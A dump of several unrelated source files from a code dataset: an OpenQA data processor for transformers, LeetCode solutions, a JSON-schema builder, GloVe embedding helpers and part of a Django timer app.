max_seq_length: The maximum sequence length of the inputs.\n doc_stride: The stride used when the context is too large and is split across several features.\n max_query_length: The maximum length of the query.\n is_training: whether to create features for model evaluation or model training.\n return_dataset: Default False. 
Either 'pt' or 'tf'.\n            if 'pt': returns a torch.data.TensorDataset,\n            if 'tf': returns a tf.data.Dataset\n        threads: number of worker processes to use for the conversion\n\n\n    Returns:\n        list of :class:`~transformers.data.processors.openqa.OpenQAFeatures`\n\n    Example::\n\n        processor = OpenQAV2Processor()\n        examples = processor.get_dev_examples(data_dir)\n\n        features = openqa_convert_examples_to_features(\n            examples=examples,\n            tokenizer=tokenizer,\n            max_seq_length=args.max_seq_length,\n            doc_stride=args.doc_stride,\n            max_query_length=args.max_query_length,\n            is_training=not evaluate,\n        )\n    \"\"\"\n\n    # Defining helper methods\n    # 'openqa_convert_example_to_features_for_cnn' converts token strings to vocabulary ids\n    features = []\n    threads = min(threads, cpu_count())\n    with Pool(threads, initializer=openqa_convert_example_to_features_init_for_cnn, initargs=(tokenizer,cnn_stoi, )) as p:\n        annotate_ = partial(\n            openqa_convert_example_to_features_for_cnn,\n            max_seq_length=max_seq_length,\n            doc_stride=doc_stride,\n            max_query_length=max_query_length,\n            is_training=is_training,\n        )\n        features = list(\n            tqdm(\n                p.imap(annotate_, examples, chunksize=32),\n                total=len(examples),\n                desc=\"convert openqa examples to features\",\n            )\n        )\n    new_features = []\n    unique_id = 1000000000\n    example_index = 0\n    # Assign example indices and unique ids here\n    for example_features in tqdm(features, total=len(features), desc=\"add example index and unique id\"):\n        if not example_features:\n            continue\n        for example_feature in example_features:\n            example_feature.example_index = example_index\n            example_feature.unique_id = unique_id\n            new_features.append(example_feature)\n            unique_id += 1\n        example_index += 1\n    features = new_features\n    del new_features\n    if return_dataset == \"pt\": # pytorch type (this is the main)\n        if not is_torch_available():\n            raise RuntimeError(\"PyTorch must be installed to return a PyTorch dataset.\")\n\n        qlength = max_query_length\n        doc_length = 300 # cap on passage tokens fed to the CNN\n\n        # Convert to Tensors and build dataset\n        all_input_ids = torch.tensor([f.input_ids for f in features], dtype=torch.long)\n        all_input_qids = torch.tensor([f.input_qids[:qlength] for f in features], dtype=torch.long) # added by Jong-Hoon Oh\n        all_input_pids = torch.tensor([f.input_pids[:doc_length] for f in features], dtype=torch.long) # added by Jong-Hoon Oh\n        all_attention_masks = torch.tensor([f.attention_mask for f in features], dtype=torch.long)\n        all_token_type_ids = torch.tensor([f.token_type_ids for f in features], dtype=torch.long)\n        all_labels = torch.tensor([1-int(f.is_impossible) for f in features], dtype=torch.long)\n        # The same tensors restricted to answerable (\"possible\") features\n        possible_input_ids = torch.tensor([f.input_ids for f in features if not f.is_impossible], dtype=torch.long)\n        possible_input_qids = torch.tensor([f.input_qids[:qlength] for f in features if not f.is_impossible], dtype=torch.long) # added by Jong-Hoon Oh\n        possible_input_pids = torch.tensor([f.input_pids[:doc_length] for f in features if not f.is_impossible], dtype=torch.long) # added by Jong-Hoon Oh\n        possible_attention_masks = torch.tensor([f.attention_mask for f in features if not f.is_impossible], dtype=torch.long)\n        possible_token_type_ids = torch.tensor([f.token_type_ids for f in features if not f.is_impossible], dtype=torch.long)\n        possible_labels = torch.tensor([1 for f in features if not f.is_impossible], dtype=torch.long)\n\n        if not is_training:\n            all_example_index = torch.arange(all_input_ids.size(0), dtype=torch.long)\n            dataset = TensorDataset(\n                all_input_ids, all_input_qids, all_input_pids, all_attention_masks, 
all_token_type_ids, all_example_index, all_labels\n ) # added/modified by Jong-Hoon Oh\n possible_example_index = torch.arange(possible_input_ids.size(0), dtype=torch.long)\n possible_dataset = TensorDataset(\n possible_input_ids, possible_input_qids, possible_input_pids, possible_attention_masks, possible_token_type_ids, possible_example_index, possible_labels\n ) \n else:\n all_start_positions = torch.tensor([f.start_position for f in features], dtype=torch.long)\n all_end_positions = torch.tensor([f.end_position for f in features], dtype=torch.long)\n # added/modified by Jong-Hoon Oh\n possible_start_positions = torch.tensor([f.start_position for f in features if not f.is_impossible], dtype=torch.long)\n possible_end_positions = torch.tensor([f.end_position for f in features if not f.is_impossible], dtype=torch.long)\n\n dataset = TensorDataset(\n all_input_ids,\n all_input_qids, # added by Jong-Hoon Oh\n all_input_pids, # added by Jong-Hoon Oh\n all_attention_masks,\n all_token_type_ids,\n all_start_positions,\n all_end_positions,\n all_labels,\n )\n possible_dataset = TensorDataset(\n possible_input_ids,\n possible_input_qids, # added by Jong-Hoon Oh \n possible_input_pids, # added by Jong-Hoon Oh \n possible_attention_masks,\n possible_token_type_ids,\n possible_start_positions,\n possible_end_positions,\n possible_labels,\n )\n\n # return all of the features, dataset, and possible_dataset\n return features, dataset, possible_dataset\n\t# (We did not touch this 'tensor_flow' part, since our code does not support tensorflow)\n elif return_dataset == \"tf\": # tensor_flow type \n if not is_tf_available():\n raise RuntimeError(\"TensorFlow must be installed to return a TensorFlow dataset.\")\n\n def gen():\n for ex in features:\n yield (\n {\n \"input_ids\": ex.input_ids,\n \"attention_mask\": ex.attention_mask,\n \"token_type_ids\": ex.token_type_ids,\n },\n {\n \"start_position\": ex.start_position,\n \"end_position\": ex.end_position,\n \"cls_index\": ex.cls_index,\n \"p_mask\": ex.p_mask,\n \"is_impossible\": ex.is_impossible,\n },\n )\n\n return tf.data.Dataset.from_generator(\n gen,\n (\n {\"input_ids\": tf.int32, \"attention_mask\": tf.int32, \"token_type_ids\": tf.int32},\n {\n \"start_position\": tf.int64,\n \"end_position\": tf.int64,\n \"cls_index\": tf.int64,\n \"p_mask\": tf.int32,\n \"is_impossible\": tf.int32,\n },\n ),\n (\n {\n \"input_ids\": tf.TensorShape([None]),\n \"attention_mask\": tf.TensorShape([None]),\n \"token_type_ids\": tf.TensorShape([None]),\n },\n {\n \"start_position\": tf.TensorShape([]),\n \"end_position\": tf.TensorShape([]),\n \"cls_index\": tf.TensorShape([]),\n \"p_mask\": tf.TensorShape([None]),\n \"is_impossible\": tf.TensorShape([]),\n },\n ),\n )\n\n return features\n\n\nclass OpenQAProcessor(DataProcessor):\n \"\"\"\n Processor for the Open-domain QA data set.\n \"\"\"\n\n train_file = None\n dev_file = None\n\n def _get_example_from_tensor_dict(self, tensor_dict, evaluate=False):\n if not evaluate:\n answer = tensor_dict[\"answers\"][\"text\"][0].numpy().decode(\"utf-8\")\n answer_start = tensor_dict[\"answers\"][\"answer_start\"][0].numpy()\n answers = [\n {\"answer_start\": start.numpy(), \"text\": text.numpy().decode(\"utf-8\")}\n for start, text in zip(tensor_dict[\"answers\"][\"answer_start\"], tensor_dict[\"answers\"][\"text\"])\n ]\n else:\n answers = [\n {\"answer_start\": start.numpy(), \"text\": text.numpy().decode(\"utf-8\")}\n for start, text in zip(tensor_dict[\"answers\"][\"answer_start\"], tensor_dict[\"answers\"][\"text\"])\n 
]\n\n answer = None\n answer_start = None\n\n return OpenQAExample(\n qas_id=tensor_dict[\"id\"].numpy().decode(\"utf-8\"),\n question_text=tensor_dict[\"question\"].numpy().decode(\"utf-8\"),\n context_text=tensor_dict[\"context\"].numpy().decode(\"utf-8\"),\n answer_text=answer,\n start_position_character=answer_start,\n title=tensor_dict[\"title\"].numpy().decode(\"utf-8\"),\n answers=answers,\n )\n\n def get_examples_from_dataset(self, dataset, evaluate=False):\n \"\"\"\n Creates a list of :class:`~transformers.data.processors.openqa.OpenQAExample` using a TFDS dataset.\n\n Args:\n dataset: The tfds dataset loaded from `tensorflow_datasets.load(\"openqa\")`\n evaluate: boolean specifying if in evaluation mode or in training mode\n\n Returns:\n List of OpenQAExample\n\n Examples::\n\n import tensorflow_datasets as tfds\n dataset = tfds.load(\"openqa\")\n\n training_examples = get_examples_from_dataset(dataset, evaluate=False)\n evaluation_examples = get_examples_from_dataset(dataset, evaluate=True)\n \"\"\"\n\n if evaluate:\n dataset = dataset[\"validation\"]\n else:\n dataset = dataset[\"train\"]\n\n examples = []\n for tensor_dict in tqdm(dataset):\n examples.append(self._get_example_from_tensor_dict(tensor_dict, evaluate=evaluate))\n\n return examples\n\n def get_train_examples(self, data_dir, filename=None):\n \"\"\"\n Returns the training examples from the data directory.\n\n Args:\n data_dir: Directory containing the data files used for training and evaluating.\n filename: None by default, specify this if the training file has a different name than the original one\n which is `train-v1.1.json` and `train-v2.0.json` for openqa versions 1.1 and 2.0 respectively.\n\n \"\"\"\n if data_dir is None:\n data_dir = \"\"\n\n if self.train_file is None:\n raise ValueError(\"OpenQAProcessor should be instantiated via OpenQAV1Processor or OpenQAV2Processor\")\n\n with open(\n os.path.join(data_dir, self.train_file if filename is None else filename), \"r\", encoding=\"utf-8\"\n ) as reader:\n input_data = json.load(reader)[\"data\"]\n return self._create_examples(input_data, \"train\")\n\n def get_dev_examples(self, data_dir, filename=None):\n \"\"\"\n Returns the evaluation example from the data directory.\n\n Args:\n data_dir: Directory containing the data files used for training and evaluating.\n filename: None by default, specify this if the evaluation file has a different name than the original one\n which is `train-v1.1.json` and `train-v2.0.json` for openqa versions 1.1 and 2.0 respectively.\n \"\"\"\n if data_dir is None:\n data_dir = \"\"\n\n if self.dev_file is None:\n raise ValueError(\"OpenQAProcessor should be instantiated via OpenQAV1Processor or OpenQAV2Processor\")\n\n with open(\n os.path.join(data_dir, self.dev_file if filename is None else filename), \"r\", encoding=\"utf-8\"\n ) as reader:\n input_data = json.load(reader)[\"data\"]\n return self._create_examples(input_data, \"dev\")\n\n def _create_examples(self, input_data, set_type):\n is_training = set_type == \"train\"\n examples = []\n for entry in tqdm(input_data):\n title = entry[\"title\"]\n for paragraph in entry[\"paragraphs\"]:\n context_text = paragraph[\"context\"] # passage\n npm_context_text = paragraph[\"npm_context\"] # npm_passage\n for qa in paragraph[\"qas\"]:\n qas_id = str(qa[\"id\"][0]) + \" \" +str(qa[\"id\"][1]) # open-domain QA spec.\n question_text = qa[\"question\"]\n npm_question_text = qa[\"npm_question\"]\n start_position_character = None\n answer_text = None\n answers = []\n\n if 
\"is_impossible\" in qa:\n is_impossible = qa[\"is_impossible\"] # v2.0 spec.\n else:\n is_impossible = False # otherwise is_impossible is set to 'False'\n\n if not is_impossible:\n if is_training:\n # only the first answer for training\n # Quasar-T and SearchQA has a single answer for each question.\n answer = qa[\"answers\"][0] \n answer_text = answer[\"text\"]\n start_position_character = answer[\"answer_start\"]\n else:\n answers = qa[\"answers\"]\n\n example = OpenQAExample(\n qas_id=qas_id,\n question_text=question_text,\n context_text=context_text,\n answer_text=answer_text,\n npm_question_text=npm_question_text,\n npm_context_text=npm_context_text,\n start_position_character=start_position_character,\n title=title,\n is_impossible=is_impossible,\n answers=answers,\n )\n\n examples.append(example)\n return examples\n\n\nclass OpenQAV1Processor(OpenQAProcessor): # this class is not used \n train_file = \"train-v1.1.json\"\n dev_file = \"dev-v1.1.json\"\n\n\nclass OpenQAV2Processor(OpenQAProcessor): # this class is not used \n train_file = \"train-v2.0.json\"\n dev_file = \"dev-v2.0.json\"\n\n\n# added/modified by Jong-Hoon Oh\nclass OpenQAExample(object):\n \"\"\"\n A single training/test example for the OpenQA dataset, as loaded from disk.\n\n Args:\n qas_id: The example's unique identifier\n question_text: The question string\n context_text: The context string\n answer_text: The answer string\n npm_question_text: The NP masked version of the question string,\n npm_context_text: The NP masked version of the context string\n start_position_character: The character position of the start of the answer\n title: The title of the example\n answers: None by default, this is used during evaluation. Holds answers as well as their start positions.\n is_impossible: False by default, set to True if the example has no possible answer.\n \"\"\"\n\n def __init__(\n self,\n qas_id,\n question_text,\n context_text,\n answer_text,\n npm_question_text,\n npm_context_text,\n start_position_character,\n title,\n answers=[],\n is_impossible=False,\n ):\n self.qas_id = qas_id\n self.question_text = question_text\n self.context_text = context_text\n self.npm_question_text = npm_question_text\n self.npm_context_text = npm_context_text\n self.answer_text = answer_text\n self.title = title\n self.is_impossible = is_impossible\n self.answers = answers\n\n self.start_position, self.end_position = 0, 0\n\n doc_tokens = []\n q_tokens = []\n npm_doc_tokens = []\n npm_q_tokens = []\n char_to_word_offset = []\n prev_is_whitespace = True\n\n # Split on whitespace so that different tokens may be attributed to their original position.\n # char to word idx mapping (for each character c, check white space and segment texts into words according to the white space)\n for c in self.context_text:\n if _is_whitespace(c):\n prev_is_whitespace = True\n else:\n if prev_is_whitespace:\n doc_tokens.append(c)\n else:\n doc_tokens[-1] += c\n prev_is_whitespace = False\n char_to_word_offset.append(len(doc_tokens) - 1)\n\n self.doc_tokens = doc_tokens\n self.char_to_word_offset = char_to_word_offset\n\n prev_is_whitespace = True\n for c in self.question_text:\n if _is_whitespace(c):\n prev_is_whitespace = True\n else:\n if prev_is_whitespace:\n q_tokens.append(c)\n else:\n q_tokens[-1] += c\n prev_is_whitespace = False\n self.q_tokens = q_tokens\n\n if start_position_character is not None and not is_impossible:\n self.start_position = char_to_word_offset[start_position_character]\n self.end_position = char_to_word_offset[\n 
min(start_position_character + len(answer_text) - 1, len(char_to_word_offset) - 1)\n ]\n\n\n \"\"\" npm (NP-Masked) text processing \"\"\"\n # Split on whitespace so that different tokens may be attributed to their original position.\n # char to word idx mapping (for each character c, check white space and segment texts into words according to the white space)\n prev_is_whitespace = True\n for c in self.npm_context_text:\n if _is_whitespace(c):\n prev_is_whitespace = True\n else:\n if prev_is_whitespace:\n npm_doc_tokens.append(c)\n else:\n npm_doc_tokens[-1] += c\n prev_is_whitespace = False\n\n self.npm_doc_tokens = npm_doc_tokens\n\n prev_is_whitespace = True\n for c in self.npm_question_text:\n if _is_whitespace(c):\n prev_is_whitespace = True\n else:\n if prev_is_whitespace:\n npm_q_tokens.append(c)\n else:\n npm_q_tokens[-1] += c\n prev_is_whitespace = False\n self.npm_q_tokens = npm_q_tokens\n\n# added/modified by Jong-Hoon Oh\nclass OpenQAFeatures(object):\n \"\"\"\n Single openqa example features to be fed to a model.\n Those features are model-specific and can be crafted from :class:`~transformers.data.processors.openqa.OpenQAExample`\n using the :method:`~transformers.data.processors.openqa.openqa_convert_examples_to_features` method.\n\n Args:\n input_ids: Indices of input sequence tokens in the vocabulary.\n attention_mask: Mask to avoid performing attention on padding token indices.\n token_type_ids: Segment token indices to indicate first and second portions of the inputs.\n cls_index: the index of the CLS token.\n p_mask: Mask identifying tokens that can be answers vs. tokens that cannot.\n Mask with 1 for tokens than cannot be in the answer and 0 for token that can be in an answer\n example_index: the index of the example\n unique_id: The unique Feature identifier\n paragraph_len: The length of the context\n token_is_max_context: List of booleans identifying which tokens have their maximum context in this feature object.\n If a token does not have their maximum context in this feature object, it means that another feature object\n has more information related to that token and should be prioritized over this feature for that token.\n tokens: list of tokens corresponding to the input ids\n token_to_orig_map: mapping between the tokens and the original text, needed in order to identify the answer.\n start_position: start of the answer token index\n end_position: end of the answer token index\n is_impossible: False by default, set to True if the example has no possible answer.\n \"\"\"\n\n def __init__(\n self,\n input_ids,\n attention_mask,\n token_type_ids,\n cls_index,\n p_mask,\n example_index,\n unique_id,\n paragraph_len,\n token_is_max_context,\n tokens,\n token_to_orig_map,\n start_position,\n end_position,\n is_impossible,\n ):\n self.input_ids = input_ids\n self.attention_mask = attention_mask\n self.token_type_ids = token_type_ids\n self.cls_index = cls_index\n self.p_mask = p_mask\n\n self.example_index = example_index\n self.unique_id = unique_id\n self.paragraph_len = paragraph_len\n self.token_is_max_context = token_is_max_context\n self.tokens = tokens\n self.token_to_orig_map = token_to_orig_map\n\n self.start_position = start_position\n self.end_position = end_position\n self.is_impossible = is_impossible\n\n# added/modified by Jong-Hoon Oh\nclass OpenQAFeatures_for_cnn(object):\n \"\"\"\n Single openqa example features to be fed to a cnn model.\n Those features are model-specific and can be crafted from 
:class:`~transformers.data.processors.openqa.OpenQAExample`\n using the :method:`~transformers.data.processors.openqa.openqa_convert_examples_to_features` method.\n\n Args:\n input_ids: Indices of input sequence tokens in the vocabulary.\n cnn_qids: Indices of input question tokens in the CNN vocabulary\n cnn_pids: Indices of input passage tokens in the CNN vocabulary\n cnn_qmasks: Mask of input question tokens for padding \n cnn_pmasks: Mask of input passage tokens for padding \n attention_mask: Mask to avoid performing attention on padding token indices.\n token_type_ids: Segment token indices to indicate first and second portions of the inputs.\n cls_index: the index of the CLS token.\n p_mask: Mask identifying tokens that can be answers vs. tokens that cannot.\n Mask with 1 for tokens than cannot be in the answer and 0 for token that can be in an answer\n example_index: the index of the example\n unique_id: The unique Feature identifier\n paragraph_len: The length of the context\n token_is_max_context: List of booleans identifying which tokens have their maximum context in this feature object.\n If a token does not have their maximum context in this feature object, it means that another feature object\n has more information related to that token and should be prioritized over this feature for that token.\n tokens: list of tokens corresponding to the input ids\n token_to_orig_map: mapping between the tokens and the original text, needed in order to identify the answer.\n start_position: start of the answer token index\n end_position: end of the answer token index\n is_impossible: False by default, set to True if the example has no possible answer.\n qas_id: The identifier for question-passage-answers\n \"\"\"\n\n def __init__(\n self,\n input_ids,\n cnn_qids,\n cnn_pids,\n cnn_qmasks,\n cnn_pmasks,\n attention_mask,\n token_type_ids,\n cls_index,\n p_mask,\n example_index,\n unique_id,\n paragraph_len,\n token_is_max_context,\n tokens,\n token_to_orig_map,\n start_position,\n end_position,\n is_impossible,\n qas_id,\n ):\n self.input_ids = input_ids\n self.input_qids = cnn_qids\n self.input_pids = cnn_pids\n self.qmasks = cnn_qmasks\n self.pmasks = cnn_pmasks\n self.attention_mask = attention_mask\n self.token_type_ids = token_type_ids\n self.cls_index = cls_index\n self.p_mask = p_mask\n\n self.example_index = example_index\n self.unique_id = unique_id\n self.paragraph_len = paragraph_len\n self.token_is_max_context = token_is_max_context\n self.tokens = tokens\n self.token_to_orig_map = token_to_orig_map\n\n self.start_position = start_position\n self.end_position = end_position\n self.is_impossible = is_impossible\n\n self.qas_id = qas_id\n\n\n# added/modified by Jong-Hoon Oh\nclass OpenQASelectorResult(object):\n \"\"\"\n Constructs a OpenQAResult which can be used to evaluate a model's output on the OpenQA dataset.\n\n Args:\n unique_id: The unique identifier corresponding to that example.\n logits: The logits corresponding to binary classification (relevant passage or not)\n \"\"\"\n\n def __init__(self, unique_id, logits):\n self.logits = logits\n self.unique_id = unique_id\n\n\n# added/modified by Jong-Hoon Oh\nclass OpenQAResult(object):\n \"\"\"\n Constructs a OpenQAResult which can be used to evaluate a model's output on the OpenQA dataset.\n\n Args:\n unique_id: The unique identifier corresponding to that example.\n start_logits: The logits corresponding to the start of the answer\n end_logits: The logits corresponding to the end of the answer\n \"\"\"\n\n def __init__(self, 
unique_id, start_logits, end_logits, start_top_index=None, end_top_index=None, cls_logits=None):\n        self.start_logits = start_logits\n        self.end_logits = end_logits\n        self.unique_id = unique_id\n\n        if start_top_index:\n            self.start_top_index = start_top_index\n            self.end_top_index = end_top_index\n            self.cls_logits = cls_logits\n","sub_path":"src/transformers/data/processors/openqa.py","file_name":"openqa.py","file_ext":"py","file_size_in_byte":40471,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"19"}
{"seq_id":"153890086","text":"# Definition for singly-linked list.\n# class ListNode:\n#     def __init__(self, x):\n#         self.val = x\n#         self.next = None\n\"\"\"\nleetcode 25: Given a linked list, reverse its nodes k at a time and return the modified list.\n\nk is a positive integer no greater than the length of the list. If the total number of nodes is not a multiple of k, the leftover nodes at the end keep their original order.\nRuntime: 56 ms, faster than 70.70% of Python3 online submissions for Reverse Nodes in k-Group.\nMemory Usage: 14.3 MB, less than 5.33% of Python3 online submissions for Reverse Nodes in k-Group.\nRecursive solution.\n\"\"\"\nclass Solution:\n    def reverseKGroup(self, head: ListNode, k: int) -> ListNode:\n        curr = head\n        count = 0\n\n        # find the (k+1)th node\n        while curr is not None and count != k:\n            curr = curr.next\n            count += 1\n\n        # If fewer than k nodes remain, leave the tail in its original order.\n        if count == k:\n            # curr is the head of the already-reversed remainder of the list\n            curr = self.reverseKGroup(curr, k)\n            while count > 0:\n                # head is the head of the k-length segment (call it X) being reversed\n                temp = head.next\n                head.next = curr\n                curr = head\n                head = temp\n                count -= 1\n                # Each pass detaches one link of X and prepends X's current head to\n                # the head of the already-reversed list.\n                # don't need the following step:\n                # temp.next = head\n                # (X's forward link needs no repair: the next iteration re-creates\n                # it, reversed, through the old-head/new-head relation.)\n            head = curr\n        return head\n\n","sub_path":"25 Reverse Nodes in k-Group.py","file_name":"25 Reverse Nodes in k-Group.py","file_ext":"py","file_size_in_byte":1781,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"19"}
{"seq_id":"207000979","text":"#!/usr/bin/env python3\n\nimport random\nfrom mygraph import rand\n\nrandom.seed(None)\n\ng = rand.undirected_cyclic(['a','b','c','d','e'])\nprint(g)\n\ng = rand.directed_acyclic(['a','b','c','d','e'])\nprint(g)\n","sub_path":"python/rg.py","file_name":"rg.py","file_ext":"py","file_size_in_byte":201,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"19"}
{"seq_id":"306611252","text":"import os\nimport yaml\n\nfrom .exceptions import SchemaRefError\n\nfrom .YAML_CONSTANTS import YAML_CONSTANTS\n\nBASE_SCHEMA = {\n    'type': 'object',\n    'additionalProperties': False,\n    'properties': {\n        'schema': { 'type': 'string' },\n        'survey': { '$ref': '#/$defs/survey' },\n        'translations': {'$ref': '#/$defs/translations' },\n        'choices': { '$ref': '#/$defs/choices' },\n        'settings': {'$ref': '#/$defs/settings'},\n    },\n}\n\nproject_path = os.path.dirname(os.path.realpath(__file__))\nYML_DIR = os.path.join(project_path, 'yml')\ndefpath = lambda defid: os.path.join(YML_DIR, 'defs', defid + '.yml')\n\ndef _load_path(fpath):\n    with open(fpath, 'r') as ff:\n        yaml_in = ff.read()\n    for (val, rep_with) in YAML_CONSTANTS:\n        if val in yaml_in:\n            yaml_in = yaml_in.replace(val, rep_with)\n    return yaml.full_load(yaml_in)\n\nBASE_SCHEMA = _load_path(os.path.join(YML_DIR, 'schema.yml'))\n\ndef _collect_refs(obj):\n    '''\n    iterate through a jsonschema object or list and yield\n    'xyz'\n    for any:\n    {'$ref':'#/$defs/xyz'}\n    that are found\n    '''\n    unpeel = lambda ss: ss.replace('#/$defs/', '')\n\n    if isinstance(obj, dict):\n        if '$ref' in obj:\n            yield unpeel(obj['$ref'])\n        else:\n            for item in obj.values():\n                for 
unpeeled in _collect_refs(item):\n yield unpeeled\n elif isinstance(obj, list):\n for item in obj:\n for unpeeled in _collect_refs(item):\n yield unpeeled\n\n\ndef build_schema(base_schema=None):\n if base_schema is None:\n base_schema = BASE_SCHEMA\n loaded = {}\n def load_schema_partials(content):\n for part in _collect_refs(content):\n if part in loaded:\n continue\n _parts = [part, '_{}'.format(part)]\n _files = [defpath(fp) for fp in _parts]\n _exists = [os.path.exists(pf) for pf in _files]\n ref_error = False\n if _exists[0] and _exists[1]:\n ref_error = 'Conflicting ref files for \"#/$defs/{}\": {}, {}'\n elif not (_exists[0] or _exists[1]):\n ref_error = 'No ref file for \"#/$defs/{}\": {} or {}'\n if ref_error:\n raise SchemaRefError(ref_error.format(part, *_parts))\n fpath = _files[0] if _exists[0] else _files[1]\n loaded[part] = _load_path(fpath)\n load_schema_partials(loaded[part])\n load_schema_partials(base_schema)\n return {'$defs': loaded,\n **base_schema}\n\nMAIN_SCHEMA = build_schema()\n","sub_path":"a1d05eba1/build_schema.py","file_name":"build_schema.py","file_ext":"py","file_size_in_byte":2589,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"19"} +{"seq_id":"624581751","text":"import numpy as np\nfrom nltk.corpus import stopwords\n\ns = set(stopwords.words('english'))\nGloveEmbeddings = {}\nemb_dim = 50\nGloveEmbeddings['zerovec'] = [0]*emb_dim\n# Map embeddings to each word from a pre trained model\n\n\ndef load_embeddings(embeddingfile):\n global GloveEmbeddings, emb_dim\n fe = open(embeddingfile, \"r\", encoding=\"utf-8\", errors=\"ignore\")\n for line in fe:\n tokens = line.strip().split()\n word = tokens[0]\n vec = tokens[1:]\n GloveEmbeddings[word] = vec\n fe.close()\n\n return\n\n# Get the array representation of each text passage / query\n\n\ndef concat_embeddings(text, query=False, max_len_p=50, max_len_q=10):\n # import nltk\n # p = nltk.PorterStemmer()\n if not query:\n filtered_text = list(filter(lambda w: not w in s, text.lower().split()))\n remaining = max_len_p - len(filtered_text)\n if remaining > 0:\n filtered_text += ['zerovec']*remaining\n else:\n filtered_text = filtered_text[:max_len_p]\n else:\n filtered_text = text.lower().split()\n remaining = max_len_q - len(filtered_text)\n if remaining > 0:\n filtered_text += ['zerovec']*remaining\n else:\n filtered_text = filtered_text[:max_len_q]\n\n processed = [\"\".join(list(filter(str.isalnum, text))) for text in filtered_text]\n # singularize = [p.stem(word) for word in processed]\n vector_array = []\n\n for i, word in enumerate(processed):\n if word in GloveEmbeddings:\n vector_array.append([float(x) for x in GloveEmbeddings[word]])\n else:\n vector_array.append(GloveEmbeddings['zerovec'])\n\n return vector_array\n\n\ndef batch_iter(data, batch_size, num_epochs, shuffle=False):\n \"\"\"\n Generates a batch iterator for a dataset.\n \"\"\"\n data = np.array(data)\n data_size = len(data)\n num_batches_per_epoch = int((len(data)-1)/batch_size) + 1\n for epoch in range(num_epochs):\n # Shuffle the data at each epoch\n if shuffle:\n shuffle_indices = np.random.permutation(np.arange(data_size))\n shuffled_data = data[shuffle_indices]\n else:\n shuffled_data = data\n for batch_num in range(num_batches_per_epoch):\n start_index = batch_num * batch_size\n end_index = min((batch_num + 1) * batch_size, data_size)\n yield 
shuffled_data[start_index:end_index]","sub_path":"init.py","file_name":"init.py","file_ext":"py","file_size_in_byte":2413,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"19"}
{"seq_id":"320892074","text":"class Solution(object):\n    def merge(self, nums1, m, nums2, n):\n        \"\"\"\n        :type nums1: List[int]\n        :type m: int\n        :type nums2: List[int]\n        :type n: int\n        :rtype: None Do not return anything, modify nums1 in-place instead.\n        \"\"\"\n        nums1[m:] = nums2\n        nums1.sort()\n\n\n# Two pointers\nclass Solution(object):\n    def merge(self, nums1, m, nums2, n):\n        \"\"\"\n        :type nums1: List[int]\n        :type m: int\n        :type nums2: List[int]\n        :type n: int\n        :rtype: None Do not return anything, modify nums1 in-place instead.\n        \"\"\"\n        # O(m+n), space O(1)\n        k = (m + n - 1)\n        i = m - 1\n        j = n - 1\n        while i >= 0 and j >= 0:\n            if nums1[i] > nums2[j]:\n                nums1[k] = nums1[i]\n                i = i - 1\n            else:\n                nums1[k] = nums2[j]\n                j = j - 1\n            k = k - 1\n        # After the loop one of two cases holds: i >= 0 or j >= 0.\n        # If i >= 0, every element of nums2 has already been merged into nums1, so we are done.\n        # If j >= 0, nums2 still has unmerged elements; copy the remaining nums2 elements into nums1.\n        while j >= 0:\n            nums1[k] = nums2[j]\n            k = k - 1\n            j = j - 1\n","sub_path":"题目分类/双指针/merge_sorted_array_88.py","file_name":"merge_sorted_array_88.py","file_ext":"py","file_size_in_byte":1281,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"19"}
{"seq_id":"484095747","text":"# Django imports\nfrom django.shortcuts import render\nfrom django.http import HttpResponseRedirect, Http404\nfrom django.core.urlresolvers import reverse\nfrom django.contrib.auth.models import User\nfrom django.contrib.auth.decorators import login_required\n# Other imports\nimport sqlite3\nfrom datetime import datetime, timedelta, time\nimport calendar\n# My imports\nfrom .forms import TimerForm\nfrom .models import Timer\n\n@login_required\ndef show(request, user_id):\n    \"\"\"Shows the timer template with form to be saved in db after measuring.\"\"\"\n    user = User.objects.get(id=user_id)\n    if request.user != user:\n        raise Http404\n    else:\n        if request.method != 'POST':\n            form = TimerForm()\n        else:\n            form = TimerForm(data=request.POST)\n            new_score = form.save(commit=False)\n            new_score.user = user # assigning the user_id to the result\n            new_score.save()\n            return HttpResponseRedirect(reverse('users:profile', args=[user_id]))\n    return render(request, 'timer/show.html', {'form' : form, 'user' : user})\n\n@login_required\ndef all(request, user_id):\n    \"\"\"Showing the overall statement for the user who is checking it.\"\"\"\n    user = User.objects.get(id=user_id)\n    if request.user != user:\n        raise Http404\n    else:\n        timers = Timer.objects.filter(user_id=user_id) # Shows all scores of user.\n        data = data_dict(timers) # My function that sums all scores into hours.\n        name = \"Overall statement\" # Heading displayed in the template.\n\n        context = {'user' : user, 'timers' : timers, 'data' : data, 'name' : name}\n        return render(request, 'timer/history/choices.html', context)\n\n@login_required\ndef today(request, user_id):\n    \"\"\"Showing today's statement for the user.\"\"\"\n    today_filter = datetime.now().date() # Current date.\n    # name - Heading displayed in the template.\n    name = datetime.now().date().strftime(\"%B %d\")\n    # timers - Scores filtered by current date and user id.\n    timers = Timer.objects.filter(date__date=today_filter, user_id=user_id)\n    user = User.objects.get(id=user_id)\n    data = data_dict(timers) # Scores summed into hours.\n\n
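    # (Editor's note) This view and the yesterday/two_days/three_days views below\n    # differ only in the day offset; a single parameterized helper could replace\n    # them, e.g. (hypothetical, not part of the app):\n    #     def _day_view(request, user_id, offset):\n    #         target = datetime.now().date() - timedelta(days=offset)\n    #         ...\n\n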
